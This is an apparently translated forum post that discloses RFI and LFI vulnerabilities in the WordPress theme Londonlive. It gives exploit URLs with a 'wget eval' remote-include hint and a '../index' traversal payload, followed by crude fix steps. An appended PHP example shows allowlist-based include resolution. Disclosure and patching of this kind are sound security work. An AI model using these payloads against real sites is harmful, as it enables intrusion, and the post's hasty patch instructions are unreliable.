Peace be upon you, and the mercy and blessings of God Almighty.


How are you guys, I hope you are well.

I discovered an RFI & LFI vulnerability in the Arabized WordPress theme Londonlive. Here is the vulnerability along with the patch:


Code:
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI 
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe 
# Version: v1.2
# Tested on: win 7
# email:[email protected]
# greetings to : pSyCh0_3D , Fontom 



#RFI exploit#

http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval





#LFI exploit#


http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index





#how to fix LFI exploit #

search for ($page.) and replace with ('../../..';) in /scripts/functions/admin_panel_functions.php then save.


#how to fix RFI exploit #

go to /themes/Londonlive/ and open functions.php and define the variable ($local_file) like this 


$local_file="./";





#thanks God for making me stronger :)
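
An allowlist-based way to turn a request parameter into an include path, relevant to both fixes in the post above. This is an added example, not part of the original post and not the Londonlive theme's code; the function name, page names and directory layout are assumptions.

```php
<?php
// Added example: all names here are hypothetical, not taken from the theme.

/**
 * Map a request-supplied page name to a file inside $baseDir, or return null.
 */
function resolve_panel_page(string $page, string $baseDir, array $allowed): ?string
{
    // 1. Allowlist: only known page names are ever turned into a path,
    //    so traversal sequences and URLs never reach the filesystem.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 2. Containment: the resolved file must exist under the base directory.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    if ($path === false) {
        return null; // allowlisted name, but no such file
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo layout in a temporary directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'panel_demo_' . getmypid();
@mkdir($root . DIRECTORY_SEPARATOR . 'pages', 0700, true);
file_put_contents($root . '/index.php', '<?php // outside the pages dir');
file_put_contents($root . '/pages/general.php', '<?php // allowed page');

$allowed = ['general', 'colors']; // hypothetical page names
foreach (['general', '../index', 'colors', 'http://example.invalid/x'] as $input) {
    $resolved = resolve_panel_page($input, $root . '/pages', $allowed);
    printf("%-26s => %s\n", $input, $resolved ?? 'rejected');
}

// Remove the constructed files again.
unlink($root . '/pages/general.php');
unlink($root . '/index.php');
rmdir($root . '/pages');
rmdir($root);
```

Only `general` resolves to a path; the traversal string, the URL and the allowlisted name with no file behind it are all rejected before anything is included.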